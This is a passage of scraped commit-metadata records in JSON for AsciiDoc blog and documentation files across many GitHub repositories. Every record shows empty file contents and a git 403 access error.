'https:\/\/github.com\/ErJ101\/hbspractise.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"708fb29879e5f1e6db8398f4c439061f26f31639","subject":"y2b create post Crazy iPhone 7 Lighter Case","message":"y2b create post Crazy iPhone 7 Lighter Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-26-Crazy-iPhone-7-Lighter-Case.adoc","new_file":"_posts\/2016-11-26-Crazy-iPhone-7-Lighter-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9841ff1708ed78f89e71c5d4108d3e0fa9fbce4a","subject":"Renamed '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc' to '_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc' to '_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b095075de3d27028a1ab0846af490de6cbf2b5b1","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27590397973a785094bdcc1e7fb4df72b88f1394","subject":"a workaround to HAWKULAR-508","message":"a workaround to HAWKULAR-508\n","repos":"tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d8e58156de821c28ff244fcaa8931ee10c138ae","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05cc6ac2b5f1ef8e75c2d2546668a32ab6d8dcc","subject":"remove regular file","message":"remove regular file\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_file":"content\/online\/2015-02-28-02-future-blogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4bc603ab21f2cd059d07e71d7a8eb1fddf221db8","subject":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","message":"Update 2018-08-30-naming-of-functions-that-return-boolean.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_file":"_posts\/2018-08-30-naming-of-functions-that-return-boolean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25e9a0f7698d929b8d478f63033748fbb3813d04","subject":"Add 2017-03-09-forge-2.6.0.final.asciidoc","message":"Add 2017-03-09-forge-2.6.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-03-09-forge-2.6.0.final.asciidoc","new_file":"news\/2017-03-09-forge-2.6.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bdb95328a833a5720b6d24cdb464a9c586c0d851","subject":"Update 2015-02-19-Hello-World.adoc","message":"Update 2015-02-19-Hello-World.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-19-Hello-World.adoc","new_file":"_posts\/2015-02-19-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5fd8a00b7caba189f438cda81a17eeeb2c975a2","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f89fb9db93f8195cd36fe882e3c87186f69b960","subject":"Delete 2016-02-26-Gantt-Style.adoc","message":"Delete 2016-02-26-Gantt-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e64b6e7832b56ecca93188eaf7894f567e9387ea","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69e71c2c69416a8371e8f85b6585fabec6de3668","subject":"Update 2019-11-03-Kisa-Kisa-3.adoc","message":"Update 2019-11-03-Kisa-Kisa-3.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2019-11-03-Kisa-Kisa-3.adoc","new_file":"_posts\/2019-11-03-Kisa-Kisa-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20ecbd3c33bd3388d1ea8f669ebb2bcd6de78670","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd170c8c39736f245c7cdf743ccee1836711bfeb","subject":"Update 2015-5-10-uGUI.adoc","message":"Update 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGUI.adoc","new_file":"_posts\/2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cb687697d92d284c1ed899374e73970ceccbd1d","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"105a70889285fa93c14db7414f7fabf1425730bb","subject":"Draft STO testing document","message":"Draft STO testing document\n\n* Link to Marv\u2019s Google Doc spreadsheet\n* Link to proof-of-concept test Specs\n","repos":"OmniLayer\/OmniJ,dexX7\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ,dexX7\/bitcoin-spock,dexX7\/bitcoin-spock,dexX7\/OmniJ","old_file":"adoc\/omni-sto-testing.adoc","new_file":"adoc\/omni-sto-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8398ab1c567b405ab59ca6b9ca493ad10ca145a","subject":"Update 2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","message":"Update 2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","new_file":"_posts\/2015-02-15-Anoixto-logismiko-kai-Aristerh-Kybernhsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e693e8373cb025d0c544b74a35d65e094c5191","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e28470049223c889f7b04bc7f5372e22ca5727a5","subject":"Update 2017-02-15-Content-views-and-composite-content-views.adoc","message":"Update 2017-02-15-Content-views-and-composite-content-views.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-02-15-Content-views-and-composite-content-views.adoc","new_file":"_posts\/2017-02-15-Content-views-and-composite-content-views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4dbab184ed500e4fbf9609772c2c5acdc2fab5b","subject":"Update 2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","message":"Update 2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","new_file":"_posts\/2017-05-27-Proof-of-an-Optimal-Broadcast-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"990e6dbefef9d56acaa87c9af96b09adda654a11","subject":"update doc","message":"update doc\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16fb7dd163c99a0910798c2b72ba2b0c91b2acff","subject":"Initial version for ha doc","message":"Initial version for ha doc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/ha.adoc","new_file":"userguide\/tutorials\/ha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79b80e10457f0b7eda08c2ac27c576f95aa0f7b6","subject":"y2b create post iPod Touch White Unboxing (4G)","message":"y2b create post iPod Touch White Unboxing (4G)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-12-iPod-Touch-White-Unboxing-4G.adoc","new_file":"_posts\/2011-10-12-iPod-Touch-White-Unboxing-4G.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d07e9fea0d22880dd30a6588da991887a6c95d","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68bb2140930050df47c13a453b9bb7682bec0b0b","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df6b5d5de8e30fd721102165ca87068b69c02969","subject":"y2b create post Google Pixel First Look Live","message":"y2b create post Google Pixel First Look Live","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-04-Google-Pixel-First-Look-Live.adoc","new_file":"_posts\/2016-10-04-Google-Pixel-First-Look-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"889d5927cc9f5e2fbdbec9e535605404ba1fc19d","subject":"[docs] Add remaining release notes for 1.7.0","message":"[docs] Add remaining release notes for 1.7.0\n\nChange-Id: I1718a2065663245a5bc438288013871566d6941b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9685\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8aac582158af6d5cce981613ff3a83da0af8b82","subject":"Update 2015-10-29-This-is-my-first-post.adoc","message":"Update 2015-10-29-This-is-my-first-post.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5600027ab0100fcb8d3d95bd4c5810f0c810d4e","subject":"Document advice about max columns and record size","message":"Document advice about max columns and record size\n\nChange-Id: I70a82d59c431f69246128acc19227af3194fa15a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2778\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0730111747f8093ce3dbff343fee714151672894","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871c1dac5b79fc14a6436a3ca8e713b077e05b54","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29d3ca6154b35330b42202b934060d73a8180612","subject":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","message":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","new_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47f78fc2c9e816bd50f9c19f5d6be21208b66f63","subject":"Update 2018-02-02-Work-done-for-72394.adoc","message":"Update 2018-02-02-Work-done-for-72394.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-02-02-Work-done-for-72394.adoc","new_file":"_posts\/2018-02-02-Work-done-for-72394.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c7e23422832223a3a73657167d7c7e9636ec439","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e376f32c1352ac2fef53ce6065f4038616faf81d","subject":"Update 2018-03-24-Blockchain-Design-considerations.adoc","message":"Update 2018-03-24-Blockchain-Design-considerations.adoc","repos":"peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io,peter-lawrey\/peter-lawrey.github.io","old_file":"_posts\/2018-03-24-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-03-24-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peter-lawrey\/peter-lawrey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bc8a9fe1bdc9b6505ebf4e7b741073894b6b217","subject":"GF4, not 5","message":"GF4, not 5\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f759cdaaa43c8eb27bc181c22b62515b28c5616b","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d956e1d5a95c364c48d2b5178bf782f506aa7067","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea37bc2cc6b07ecaa422920705c5b43f9a65ca65","subject":"Update 2015-06-16-Role-uzivatelu.adoc","message":"Update 2015-06-16-Role-uzivatelu.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_file":"_posts\/2015-06-16-Role-uzivatelu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932fd10b1c5cb5ad9d8a6fa3607e05de8a159502","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcabc32c8a4c84709305c7f77099e5152df9d4be","subject":"Update 2018-04-23-Crypto-Zombies.adoc","message":"Update 